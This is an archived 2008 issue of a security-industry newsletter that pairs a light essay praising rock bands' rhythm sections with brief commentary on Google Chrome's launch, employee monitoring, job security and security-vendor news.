September 4, 2008 - Volume 3, #74

Good Morning:
After seeing so many live music shows this year, the sizzle is waning. Sure, it's great to see fantastic, charismatic singers. And folks that can make sounds come out of guitar that boggle the mind. But while I was seeing My Morning Jacket last week or John Mayer over the weekend, I didn't focus on the guitarists (as good as they are). I wanted to pay attention a bit to the unsung heroes that make live music happen.
The anonymous bass player
That's right, let's hear it for the rhythm section - the bass guitarist and the drummer. With very rare exceptions you don't go see a band because you like the bass player or the drummer. Of course, you go to see Rush to remind yourself how great Neil Peart is. I think that Sting guy may be able to sing also. But beyond that, who is the drummer? Who is the bass player?

So at the last two shows I tried my best to pay more attention to the bass player and the drummer. They were good. MMJ's drummer had long hair that seemed to do more damage to the cymbals than his drum sticks. John Mayer's bass player kept the rhythm going, but now a few days after the show, I couldn't tell you what that guy looked like. I guess I'm like everyone else. It's the shiny objects that are memorable, not the rhythm section.

The guitarists get all the money and the chicks (or guys if they swing that way). So this weekend let's try not to forget these other folks, even if they are entirely forgettable. Go find a bass player or a drummer and thank them for the labor they provide during every live show. Tell them without their contributions, you'd only have half a band. Half a band sounds like crap.

And then get back to staring at the guitarist. Man, those guys can play!

Have a great weekend.

Photo: "bass player" originally uploaded by davidex [1]

Technorati: Information Security [2], CSO [3], Security Mike [4], Internet Security [5]

[6]
The Pragmatic CSO:
Available Now!

Read the Intro and Get
"5 Tips to be a Better CSO"

www.pragmaticcso.com [7]

Get Your Special Report:
6 Easy Steps to Protect Your Identity
and
get access to Security Mike's Portal today

www.securitymike.com
[8]
Security Mike's Guide to Internet Security

Security Mike's Guide to Internet Security

[9]

Top Security News

Evidently the browser works OK [10], according to the folks that have played with it. Dennis Fisher figures won't make a huge dent in market share beyond the digit heads [11], Mitchell is bitching about having to Q/A another browser platform [12]. Do I think this is earth shattering? Nope. But it's clear that the underlying OS will just be a host for a variety of "application" platforms that are optimized for specific use cases. Chrome will be one, maybe Firefox another, maybe you'll get developers extending Chrome to optimize it for their own environments. And it won't matter if you run Windows or Mac OS X or even Linux on your device. This will likely accelerate the marginalization of the OS, and that's a good thing. Amrit is on the right track [13] about this being a "platform" more than anything else. But let's not anoint Chrome as the best thing since sliced bread from a security standpoint until it's been proven. Google does beta stuff pretty well and until I can get NoScript type of functionality (and a Mac version), I'll be waiting on the sidelines.
Link to this [14]

As Seltzer points out, it's not clear what the real impact will be for compliance purposes [15] and monitoring the use of technology usage by employees. But all is not lost, since we can still monitor the network. You also may want to (try to) enforce the usage of a VPN for remote employees, so their web traffic is routed through your network. Then you can monitor that too. That one's a bit harder, but it's possible. The action-reaction process continues unabated. At least you know these new actions are happening, so you can plan your reactions.
Link to this [16]

NetworkWorld has a good article that provides some tips to dealing with it [17]. Basically, you can't freak out and hopefully you've been making contingency plans all along. If you work for someone else, it's kind of silly to assume things won't change in the business and that you'll always be welcome. This isn't the 1950's folks, there is no guaranteed, lifetime employment and a cushy pension at the back end of 30 years of toil and trouble. If you are too "busy" to take some action and get out and network a bit or to even develop a contingency plan, do a little visioning exercise with me. Vision that you are packing up boxes in your office. Then vision how you are going to pay the bills and keep your significant other in the lifestyle she/he has become accustomed to. Not a pretty picture, right? So make sure you are constantly thinking about what's next. Better to be safe, then dealing with the repo man.
Link to this [18]

The Laundry List

Secure Computing puts Securify out of their misery for $15 million and an earn out. VCs took a bath on this one, but that's life in the big city. And it goes to show even a cat only has 9 lives. - Secure Computing release [19]
Novell introduces the most "advanced compliance management" solution, which evidently is a knife to kill the auditor in the parking lot. All kidding aside, what kind of differentiator is "advanced?" - Novell release [20]
Sick of paying for AV? Build your own, just don't try to manage it for more than a desktop or two. - NetworkWorld [21]
You think Ballmer will be master of his own domain? He's under a lot of stress, you know? Maybe Seinfeld will help them fend off the Mac Guy, but probably not. No Office for You! - Dvorak MarketWatch column [22]

The Daily Incite - September 4, 2008

September 4, 2008 - Volume 3, #74

Top Security News

Top Blog Postings